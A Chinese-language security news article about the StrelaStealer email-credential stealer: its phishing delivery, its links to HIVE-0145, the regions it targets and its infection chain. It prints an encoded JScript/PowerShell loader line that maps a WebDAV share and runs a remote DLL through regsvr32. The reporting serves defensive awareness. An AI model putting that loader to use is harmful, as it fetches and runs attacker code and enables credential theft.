研究人员发现恶意软件 StrelaStealer 专门针对 Microsoft Outlook 和 Mozilla Thunderbird 等热门电子邮件客户端的电子邮件凭据，给全球范围内的各类组织带来了严重的安全隐患。

该恶意软件通过窃取敏感的登录信息来运作，这有可能让攻击者获取到关键的通信内容和数据。

StrelaStealer 主要通过大规模的网络钓鱼活动进行传播。这些活动会发送包含恶意 JavaScript 文件的 ZIP 压缩文件。这些初始的感染载体是复杂攻击链的第一阶段。在这个阶段，相关脚本会从 WebDAV 服务器获取恶意的动态链接库（DLL）有效载荷，并直接在内存中执行，从而避开了许多传统的检测方法。

这种复杂精妙的传播机制使得攻击者能够绕开标准的安全控制措施，同时还能保证攻击行动的有效性。

这些恶意软件攻击活动已经影响了欧美地区 100 多个组织，尤其集中在意大利、西班牙、德国和乌克兰。

这些攻击的广泛传播表明，这是一场精心策划的行动，有着特定的攻击目标参数，而非随机散布的。

AttackIQ 的研究人员发现，StrelaStealer 与被称为 HIVE-0145 的威胁行为者组织有关，该组织自 2022 年末起就十分活跃。

安全分析师认为，这个组织是出于经济利益驱动的初始访问中间人，很可能是 StrelaStealer 恶意软件部署背后的唯一操控者。

对该威胁行为者的识别，为理解这种恶意软件的攻击目标和运作模式提供了宝贵的背景信息。

2024 年 11 月的最新分析显示，其传播和混淆技术得到了更新，这表明这种恶意软件在持续演变。

这些技术上的提升说明该威胁正处于积极的开发和维护状态，也意味着攻击活动仍在继续。

深入剖析感染机制

StrelaStealer 的感染过程始于受害者执行 ZIP 压缩文件中的 JavaScript 文件，通常是通过 Windows 脚本宿主（CScript 或 WScript）来执行。

初始脚本采用了多阶段的混淆技术，近期观察到的变种使用了以下技术：

var encoded = “powershell.exe -enc UEdVdEFBQiB1c2UgXFxcXDEwLjEwLjEwLjEwXFxzaGFyZSAvcGVyc2lzdDpubzsgcmVnc3ZyMzIgXFxcXDEwLjEwLjEwLjE

wXFxzaGFyZVxwYXlsb2FkLmRsbA==”

WScript.CreateObject(“WScript.Shell”).Run(encoded,0,true);

这段代码会启动一个 PowerShell 进程，该进程会执行一条经过编码的命令，以映射一个 WebDAV 网络路径，随后使用 Regsvr32 远程注册并执行托管在该共享路径上的 DLL 有效载荷。

随后，该恶意软件会进行广泛的系统侦察，在通过未加密的 HTTP 连接窃取所收集到的数据之前，它会收集有关主机系统、已安装的应用程序、国家区域设置以及网络连接状态等信息。

这种复杂精妙的攻击方式展示了威胁行为者在力求隐蔽自身以及确保操作安全的同时，还能在目标组织中高效获取凭据的能力。